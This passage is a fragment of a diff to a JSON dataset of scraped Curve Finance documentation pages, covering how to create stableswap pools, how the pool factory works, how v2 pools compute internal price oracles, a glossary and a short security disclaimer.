select the appropriate box: The UI will not check to see if a pool containing your token pairs already exists. Some protocols have seen opportunities to create two pools containing the same assets but using different parameters (c/f stETH concentrated ). In most cases you should take care to make sure your pool does not already exist. Pool Presets The \"Pool Presets\" tab contains a few scenarios that prepopulate appropriate parameters for users unfamiliar with advanced aspects of Curve pools. The presets include an explanation of their use case. The Advanced options toggle includes a variety of options which may not apply to your case. Parameters The parameters tab allows you to adjust pool parameters. The pool's fee is applied to all transactions within the pool, half of which accrues to pool LPs, the other half is distributed to veCRV stakers. The fee for StableSwap pools may be set between .04% and 1%. The Advanced tab allows you to adjust the pool's \"A Parameter.\" The A Parameter is set by default based on your selection on the prior tab. A higher value for A concentrates liquidity better. If the assets are likely to fluctuate heavily you may want to lower the value below the default of 100. After the pool launches, the DAO has the capability of adjusting the A parameter. Understanding Curve Pools Pool Info Finally, you may adjust factors used for displaying the pool on the Curve site. These cannot be adjusted after launching so be careful when selecting these parameters. On the Curve UI the pools are grouped by the \"Asset Type Tag.\" This only affects its display on the Curve website, it has no effect on the pool's performance. USD: For pools only containing dollarcoins ETH: For pools only containing ETH BTC: For pools only containing BTC Other: All other assets Your pool is ready to launch! It will now appear on the Curve page, but it's not yet eligible to earn $CRV rewards. For next steps you will typically want to seed initial liquidity and create a pool gauge . Creating a Pool Gauge Last update: 2023-09-07 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a stableswap pool Table of contents Token Selection Pool Presets Parameters Pool Info Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Token Selection Pool Presets Parameters Pool Info Home Factory Pools Creating a stableswap pool The Stableswap pool creation is appropriate for assets expected to hold a price peg very close to each other, like a pair of dollarcoins. The creation wizard will guide you through the process of creating a pool, but if you have questions throughout you are encouraged to speak with a member of the Curve team in the Telegram or Discord . Token Selection The token selection tab can be used to select between two to four tokens. You can select a token by searching for the symbol of any token that is already being used on Curve, or by pasting the pools address. On Ethereum you might observe a handful of popular assets (ie Tether, USDC, Frax) are not available in the token selection dropdown. Some of these assets have been added to \"base pools,\" which can be used in the creation of other \"metapools.\" Base & MetaPools Base pools are suggested at the top of the token selection modal. As of April 2023, Curve supported two stablecoin basepools (3CRV/FraxBP) and a BTC basepool (sbTC2Crv). If you want to include a token that is part of a base pool, you must use it as part of a corresponding base pool. Base pools can only be paired with one other token. If you are using raw ether as a token, it must be added as \"Token A.\" WETH may be added as either Token A or Token B. If your pool contains rebasing tokens (a token that adjusts its total supply to control its price), make sure to select the appropriate box: The UI will not check to see if a pool containing your token pairs already exists. Some protocols have seen opportunities to create two pools containing the same assets but using different parameters (c/f stETH concentrated ). In most cases you should take care to make sure your pool does not already exist. Pool Presets The \"Pool Presets\" tab contains a few scenarios that prepopulate appropriate parameters for users unfamiliar with advanced aspects of Curve pools. The presets include an explanation of their use case. The Advanced options toggle includes a variety of options which may not apply to your case. Parameters The parameters tab allows you to adjust pool parameters. The pool's fee is applied to all transactions within the pool, half of which accrues to pool LPs, the other half is distributed to veCRV stakers. The fee for StableSwap pools may be set between .04% and 1%. The Advanced tab allows you to adjust the pool's \"A Parameter.\" The A Parameter is set by default based on your selection on the prior tab. A higher value for A concentrates liquidity better. If the assets are likely to fluctuate heavily you may want to lower the value below the default of 100. After the pool launches, the DAO has the capability of adjusting the A parameter. Understanding Curve Pools Pool Info Finally, you may adjust factors used for displaying the pool on the Curve site. These cannot be adjusted after launching so be careful when selecting these parameters. On the Curve UI the pools are grouped by the \"Asset Type Tag.\" This only affects its display on the Curve website, it has no effect on the pool's performance. USD: For pools only containing dollarcoins ETH: For pools only containing ETH BTC: For pools only containing BTC Other: All other assets Your pool is ready to launch! It will now appear on the Curve page, but it's not yet eligible to earn $CRV rewards. For next steps you will typically want to seed initial liquidity and create a pool gauge . Creating a Pool Gauge 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Pool factory", + "title": "Understanding pool factory", "html_url": "https://resources.curve.fi/factory-pools/pool-factory/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Pool factory Table of contents Understanding Factory Pools Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Factory Pools Pool factory Understanding Factory Pools The Curve pool creation factory allows any user to permissionlessly deploy a Curve pool. These pools can contain a variety of assets, including pegged tokens, unpegged tokens, and metapools built off of other base pools . Base & MetaPools Keep in mind a few points about all pools: Destroying Curve pools once deployed is not possible Curve is not responsible for any of the assets going in there so you must do your own research when trading in the pool factory. The Curve team and DAO also have no control over the tokens added in the factory which means you must verify the token addresses you trade on there. The only admin change that can be made by the Curve DAO is ramping the A (amplification) parameter Tokens with more than 18 decimals are not supported After deploying a pool, you must seed initial liquidity if you want users to interact with it. Pools will only display on the homepage by default if their TVL is not below the threshold of what is considered \"small.\" https://curve.fi/#/ethereum/create-pool To get started, visit the \" Pool Creation \" tab at the top of the Curve homepage, and select whether you would like to create a \"Stableswap Pool\" (a pool with pegged assets) or a \"Cryptoswap Pool\" (containing assets whose prices may be volatile). Creating a Stableswap Pool Creating a Cryptoswap Pool Note some sidechains may not yet support a stableswap or cryptoswap pool factory. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Home Factory Pools Understanding pool factory The Curve pool creation factory allows any user to permissionlessly deploy a Curve pool. These pools can contain a variety of assets, including pegged tokens, unpegged tokens, and metapools built off of other base pools . Base & MetaPools Keep in mind a few points about all pools: Destroying Curve pools once deployed is not possible Curve is not responsible for any of the assets going in there so you must do your own research when trading in the pool factory. The Curve team and DAO also have no control over the tokens added in the factory which means you must verify the token addresses you trade on there. The only admin change that can be made by the Curve DAO is ramping the A (amplification) parameter Tokens with more than 18 decimals are not supported After deploying a pool, you must seed initial liquidity if you want users to interact with it. Pools will only display on the homepage by default if their TVL is not below the threshold of what is considered \"small.\" https://curve.fi/#/ethereum/create-pool To get started, visit the \" Pool Creation \" tab at the top of the Curve homepage, and select whether you would like to create a \"Stableswap Pool\" (a pool with pegged assets) or a \"Cryptoswap Pool\" (containing assets whose prices may be volatile). Creating a Stableswap Pool Creating a Cryptoswap Pool Note some sidechains may not yet support a stableswap or cryptoswap pool factory. 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1962,7 +1962,7 @@ { "title": "Understanding oracles", "html_url": "https://resources.curve.fi/factory-pools/understanding-oracles/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Understanding oracles Table of contents Understanding Oracles Purpose Exponential Moving Average Updates Price Oracle Profits and Liquidity Balances Manipulation v1 Pools LLAMMA Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Oracles Purpose Exponential Moving Average Updates Price Oracle Profits and Liquidity Balances Manipulation v1 Pools LLAMMA Understanding oracles Understanding Oracles This article primarily covers the role of internal price oracles within Curve Finance v2 pools, with a brief note at the end of LLAMMA price oracles . Please note that Curve v1 and v2 pools do not rely on external price oracles. Misuse of external price oracles is a contributing factor to several major DeFi hacks. If you are looking to use Curves price oracle functions, or any price oracle, to provide on-chain pricing data in a decentralized application you are building, we recommend extreme caution. Purpose Curve v2 pools , which consist of assets with volatile prices, require a means of tracking prices. Instead of relying on external oracles, the pool instead calculates the price of these assets internally based on the trading activity within the pool. This is tracked by two similar but distinct parameters: Price Oracle: The pools expectation of the assets price Price Scale: The price based on the pools actual concentration of liquidity Pools keep track of recent trades within the pool as a variable called last_prices . The price_oracle is calculated as an exponential moving average of recent trade prices. The price_oracle represents what the pool believes is the fair price of the asset . In contrast, price_scale is a snapshot of how the liquidity in the pool is actually distributed. For this reason, price_scale lags price_oracle . As users make trades, the pool calculates how to profitably readjust liquidity , and the price_scale moves in the direction of the price_oracle . Price Oracle and Price Scale shown in the Curve UI Exponential Moving Average As discussed above , the price_oracle variable is calculated as an exponential moving average of last_prices . For comparison, traders commonly rely on a simple moving average as a technical analysis indicator, which calculates the average of a certain number points (ie, a 200-day moving average computes the average of the trailing 200 days of data). The exponential moving average\" is similar, except it applies a weighting to emphasize newer data over older data. This weighting falls off exponentially as it looks further back in time, so it can react quicker to recent trends. Updates An internal function tweak_price is called every time prices might need to be updated by an operation which might adjust balances within a pool (hereafter referred to as a liquidity operation ): add_liquidity remove_liquidity_one_coin exchange exchange_underlying The tweak_price function is a gas expensive function which can execute several state changing operations to state variables_._ Price Oracle The price_oracle is updated only once per block. If the current timestamp is greater than the timestamp of the last update, then price_oracle is updated using the previous price_oracle value and data from last_prices . The updated price_oracle is then used to calculate the vector distance from the price_scale , which is used to determine the amount of adjustment required for the price_scale . Profits and Liquidity Balances Curve v2 pools operate on profits. That is, liquidity is rebalanced when the pool has earned sufficient profits to do so. Every time a liquidity operation occurs, the pool chooses whether it should spend profits on rebalancing. The pools actions may be considered as an attempt to rebalance liquidity close to market prices. Pools perform all such operations strictly with profits, never with user funds. Profits are occasionally claimed by administrators, otherwise funds remain in the pool. In other words, profits can be calculated from the following function: profits == erc20.balanceOf(i) - pool.balances(i) Internally, every time the tweak_price function is called during a liquidity operation , the pool tracks profits. It then uses the updated profit values to consider if it should rebalance liquidity. Specifically, pools carry a public parameter called allowed_extra_profit which works like a buffer. If the pools virtual price has grown by more than a function of profits and the allowed_extra_profit buffer value, then the pool is considered profitable enough to rebalance liquidity. From here, the pool further checks that the price_scale is sufficiently different from price_oracle , to avoid rebalancing liquidity when prices are pegged. Finally, the pool computes the updates to the price_scale and how this affects other pool parameters. If profits still allow, then the liquidity is rebalanced and prices are adjusted. Manipulation We do not recommend using Curve pools by themselves as canonical price oracles. It is possible, particularly with low liquidity pools, for outside users to manipulate the price. Curve pools nonetheless include protections against some forms of manipulation. The logic of the Curve price_oracle variable only updates once per block, which makes it more resistant to manipulation from malicious trading activity within a single block. Due to the fact that changes to price_oracle are dampened by an exponential moving average , attempts to manipulate the price may succeed but would require a prolonged attack over several blocks. Actual $CVX price versus CVX-ETH Pool Price Oracle and Price Scale during rapid volatility These safeguards all help to prevent various forms of manipulation. However, for pools with low liquidity, it is not difficult for whales to manipulate the price over the course of several transactions. When relying on oracles on-chain, it is safest to compare results among several oracles and revert if any is behaving unusually. v1 Pools Newer v1 Pools also contain a price oracle function, which also displays a moving average of recent prices. If the moving average price was written to the contract in the same block it will return this value, otherwise it will calculate on the fly any changes to the moving average since it was last written. Curve v1 pools do not have a concept of price scale, so no endpoint exists for retreiving this value. Older v1 pools will also not have a price oracle, so use caution if you are attempting to retrieve this value on-chain. LLAMMA The LLAMMA use of oracles is quite different than Curve v2 pools in that it can utilize external price oracles. In LLAMMA, the price_oracle function refers to the collateral price (which can be thought of as the current market price) as determined by an external contract. For example, LLAMMA uses price_oracle to convert $ETH to $crvUSD at a specific collateral price. When the external price is higher than the upper price (internally: P_UP ), all assets in the band range are converted to $ETH. When the price is lower than the lower price (internally: P_DOWN ), all assets are converted to $crvUSD. When the oracle price is in the middle, the current band is partially converted, with the exact proportion determined by price changes. When the external price changes, an arbitrage opportunity exists. External arbitrageurs can deposit $ETH or $crvUSD to balance the pool, until the pool price reaches parity with the external price. LLAMMA applies an exponential moving average to the price_oracle to prevent users from absorbing losses due to drastic fluctuations. More information on price oracles and other LLAMMA dynamics are available at this article . Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Understanding oracles Table of contents Purpose Exponential Moving Average Updates Price Oracle Profits and Liquidity Balances Manipulation v1 Pools LLAMMA Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Purpose Exponential Moving Average Updates Price Oracle Profits and Liquidity Balances Manipulation v1 Pools LLAMMA Home Factory Pools Understanding oracles This article primarily covers the role of internal price oracles within Curve Finance v2 pools, with a brief note at the end of LLAMMA price oracles . Please note that Curve v1 and v2 pools do not rely on external price oracles. Misuse of external price oracles is a contributing factor to several major DeFi hacks. If you are looking to use Curves price oracle functions, or any price oracle, to provide on-chain pricing data in a decentralized application you are building, we recommend extreme caution. Purpose Curve v2 pools , which consist of assets with volatile prices, require a means of tracking prices. Instead of relying on external oracles, the pool instead calculates the price of these assets internally based on the trading activity within the pool. This is tracked by two similar but distinct parameters: Price Oracle: The pools expectation of the assets price Price Scale: The price based on the pools actual concentration of liquidity Pools keep track of recent trades within the pool as a variable called last_prices . The price_oracle is calculated as an exponential moving average of recent trade prices. The price_oracle represents what the pool believes is the fair price of the asset . In contrast, price_scale is a snapshot of how the liquidity in the pool is actually distributed. For this reason, price_scale lags price_oracle . As users make trades, the pool calculates how to profitably readjust liquidity , and the price_scale moves in the direction of the price_oracle . Price Oracle and Price Scale shown in the Curve UI Exponential Moving Average As discussed above , the price_oracle variable is calculated as an exponential moving average of last_prices . For comparison, traders commonly rely on a simple moving average as a technical analysis indicator, which calculates the average of a certain number points (ie, a 200-day moving average computes the average of the trailing 200 days of data). The exponential moving average\" is similar, except it applies a weighting to emphasize newer data over older data. This weighting falls off exponentially as it looks further back in time, so it can react quicker to recent trends. Updates An internal function tweak_price is called every time prices might need to be updated by an operation which might adjust balances within a pool (hereafter referred to as a liquidity operation ): add_liquidity remove_liquidity_one_coin exchange exchange_underlying The tweak_price function is a gas expensive function which can execute several state changing operations to state variables_._ Price Oracle The price_oracle is updated only once per block. If the current timestamp is greater than the timestamp of the last update, then price_oracle is updated using the previous price_oracle value and data from last_prices . The updated price_oracle is then used to calculate the vector distance from the price_scale , which is used to determine the amount of adjustment required for the price_scale . Profits and Liquidity Balances Curve v2 pools operate on profits. That is, liquidity is rebalanced when the pool has earned sufficient profits to do so. Every time a liquidity operation occurs, the pool chooses whether it should spend profits on rebalancing. The pools actions may be considered as an attempt to rebalance liquidity close to market prices. Pools perform all such operations strictly with profits, never with user funds. Profits are occasionally claimed by administrators, otherwise funds remain in the pool. In other words, profits can be calculated from the following function: profits == erc20.balanceOf(i) - pool.balances(i) Internally, every time the tweak_price function is called during a liquidity operation , the pool tracks profits. It then uses the updated profit values to consider if it should rebalance liquidity. Specifically, pools carry a public parameter called allowed_extra_profit which works like a buffer. If the pools virtual price has grown by more than a function of profits and the allowed_extra_profit buffer value, then the pool is considered profitable enough to rebalance liquidity. From here, the pool further checks that the price_scale is sufficiently different from price_oracle , to avoid rebalancing liquidity when prices are pegged. Finally, the pool computes the updates to the price_scale and how this affects other pool parameters. If profits still allow, then the liquidity is rebalanced and prices are adjusted. Manipulation We do not recommend using Curve pools by themselves as canonical price oracles. It is possible, particularly with low liquidity pools, for outside users to manipulate the price. Curve pools nonetheless include protections against some forms of manipulation. The logic of the Curve price_oracle variable only updates once per block, which makes it more resistant to manipulation from malicious trading activity within a single block. Due to the fact that changes to price_oracle are dampened by an exponential moving average , attempts to manipulate the price may succeed but would require a prolonged attack over several blocks. Actual $CVX price versus CVX-ETH Pool Price Oracle and Price Scale during rapid volatility These safeguards all help to prevent various forms of manipulation. However, for pools with low liquidity, it is not difficult for whales to manipulate the price over the course of several transactions. When relying on oracles on-chain, it is safest to compare results among several oracles and revert if any is behaving unusually. v1 Pools Newer v1 Pools also contain a price oracle function, which also displays a moving average of recent prices. If the moving average price was written to the contract in the same block it will return this value, otherwise it will calculate on the fly any changes to the moving average since it was last written. Curve v1 pools do not have a concept of price scale, so no endpoint exists for retreiving this value. Older v1 pools will also not have a price oracle, so use caution if you are attempting to retrieve this value on-chain. LLAMMA The LLAMMA use of oracles is quite different than Curve v2 pools in that it can utilize external price oracles. In LLAMMA, the price_oracle function refers to the collateral price (which can be thought of as the current market price) as determined by an external contract. For example, LLAMMA uses price_oracle to convert $ETH to $crvUSD at a specific collateral price. When the external price is higher than the upper price (internally: P_UP ), all assets in the band range are converted to $ETH. When the price is lower than the lower price (internally: P_DOWN ), all assets are converted to $crvUSD. When the oracle price is in the middle, the current band is partially converted, with the exact proportion determined by price changes. When the external price changes, an arbitrage opportunity exists. External arbitrageurs can deposit $ETH or $crvUSD to balance the pool, until the pool price reaches parity with the external price. LLAMMA applies an exponential moving average to the price_oracle to prevent users from absorbing losses due to drastic fluctuations. More information on price oracles and other LLAMMA dynamics are available at this article . 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1970,7 +1970,15 @@ { "title": "Glossary", "html_url": "https://resources.curve.fi/faq/glossary/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Glossary Table of contents Glossary 3CRV Admin fee Boosting (also boosties) CRV DeFi (Decentralized Finance) Metamask Metapool Llamas LP (Liquidity provider) LP tokens (Liquidity provider token) Yearn yCRV yUSD (also yyCRV) Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Glossary 3CRV Admin fee Boosting (also boosties) CRV DeFi (Decentralized Finance) Metamask Metapool Llamas LP (Liquidity provider) LP tokens (Liquidity provider token) Yearn yCRV yUSD (also yyCRV) Glossary Glossary 3CRV 3CRV is the LP token for the 3Pool (sometimes referred to as TriPool). Trading fees are distributed in 3CRV. Admin fee Admin fee is the share of trading fees that are received by governance participants who have locked their CRV (see veCRV). Boosting (also boosties) The act of locking your CRV to earn more CRV on your provided liquidity. Boosting your CRV Rewards CRV Governance and utility token for the Curve DAO. DeFi (Decentralized Finance) Decentralized finance (commonly referred to as DeFi) is an experimental form of finance that does not rely on financial intermediaries such as brokerages, exchanges, or banks, and instead utilizes blockchains, most commonly the Ethereum blockchain. Metamask Metamask is an Ethereum wallet that allows you to interact with Curve and other dapps. You can also use it with Ledger and Trezor hardware wallets. It's the most popular Ethereum web wallet and is available as an add-on for most browsers. Metapool Metapools are a type of pool on Curve composed of one asset as well as as LP tokens from another pool. Base & MetaPools Llamas Llamas are wonderful and magical creatures. Each Curve team member must own at least one llama as part of their contract with Curve Finance. LP (Liquidity provider) Users providing liquidity (funds/assets) on the Curve or other DeFi protocols. LP tokens (Liquidity provider token) When you deposit into a Curve pool, you receive a counter party token which represents your share of the pool. veCRV Stands for vote-escrowed CRV. They are CRV locked for the purpose of voting and earning fees. Understanding $CRV Yearn Yearn Protocol is a set of Ethereum Smart Contracts focused on creating a simple way to generate high risk-adjusted returns for depositors of various assets via best-in-class lending protocols, liquidity pools, and community-made yield farming strategies on Ethereum. It was founded by Andre Cronje who has been a long term collaborator of Curve Finance. yCRV yCRV is not wrapped CRV, it's a wrapped representation of ownership of yUSDC+yUSDT+yDAI+yTUSD deposits in the Curve Y pool (i.e. your share of the pool). Each pool on Curve has an LP token with a different name. yUSD (also yyCRV) Yearn token wrapper that represents shares of the Y pool inside the Yearn Y Pool vault. It is a wrapped version of yCRV. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Glossary Table of contents 3CRV Admin fee Boosting (also boosties) CRV DeFi (Decentralized Finance) Metamask Metapool Llamas LP (Liquidity provider) LP tokens (Liquidity provider token) Yearn yCRV yUSD (also yyCRV) Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents 3CRV Admin fee Boosting (also boosties) CRV DeFi (Decentralized Finance) Metamask Metapool Llamas LP (Liquidity provider) LP tokens (Liquidity provider token) Yearn yCRV yUSD (also yyCRV) Home Appendix Glossary 3CRV 3CRV is the LP token for the 3Pool (sometimes referred to as TriPool). Trading fees are distributed in 3CRV. Admin fee Admin fee is the share of trading fees that are received by governance participants who have locked their CRV (see veCRV). Boosting (also boosties) The act of locking your CRV to earn more CRV on your provided liquidity. Boosting your CRV Rewards CRV Governance and utility token for the Curve DAO. DeFi (Decentralized Finance) Decentralized finance (commonly referred to as DeFi) is an experimental form of finance that does not rely on financial intermediaries such as brokerages, exchanges, or banks, and instead utilizes blockchains, most commonly the Ethereum blockchain. Metamask Metamask is an Ethereum wallet that allows you to interact with Curve and other dapps. You can also use it with Ledger and Trezor hardware wallets. It's the most popular Ethereum web wallet and is available as an add-on for most browsers. Metapool Metapools are a type of pool on Curve composed of one asset as well as as LP tokens from another pool. Base & MetaPools Llamas Llamas are wonderful and magical creatures. Each Curve team member must own at least one llama as part of their contract with Curve Finance. LP (Liquidity provider) Users providing liquidity (funds/assets) on the Curve or other DeFi protocols. LP tokens (Liquidity provider token) When you deposit into a Curve pool, you receive a counter party token which represents your share of the pool. veCRV Stands for vote-escrowed CRV. They are CRV locked for the purpose of voting and earning fees. Understanding $CRV Yearn Yearn Protocol is a set of Ethereum Smart Contracts focused on creating a simple way to generate high risk-adjusted returns for depositors of various assets via best-in-class lending protocols, liquidity pools, and community-made yield farming strategies on Ethereum. It was founded by Andre Cronje who has been a long term collaborator of Curve Finance. yCRV yCRV is not wrapped CRV, it's a wrapped representation of ownership of yUSDC+yUSDT+yDAI+yTUSD deposits in the Curve Y pool (i.e. your share of the pool). Each pool on Curve has an LP token with a different name. yUSD (also yyCRV) Yearn token wrapper that represents shares of the Y pool inside the Yearn Y Pool vault. It is a wrapped version of yCRV. 2023-09-28 Back to top", + "labels": [ + "Documentation" + ] + }, + { + "title": "Security", + "html_url": "https://resources.curve.fi/faq/security/", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Security Table of contents Audits Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Audits Home Appendix Security Curve Finance emphasizes its commitment to security by regularly undergoing audits from reputable third-party firms. These audits aim to uncover potential vulnerabilities and ensure that the protocol's smart contracts function as intended. However, as with all DeFi platforms, users should be aware that engaging with Curve Finance carries inherent risks. Despite the thoroughness of audits, they do not guarantee complete security , and potential vulnerabilities might still emerge in the future. Therefore, individuals should always proceed with caution and understand that the use of the protocol is at their own risk . Audits For a detailed look into the audits Curve Finance has undergone, please refer to here . 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1978,7 +1986,7 @@ { "title": "Proposals", "html_url": "https://resources.curve.fi/governance/proposals/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets 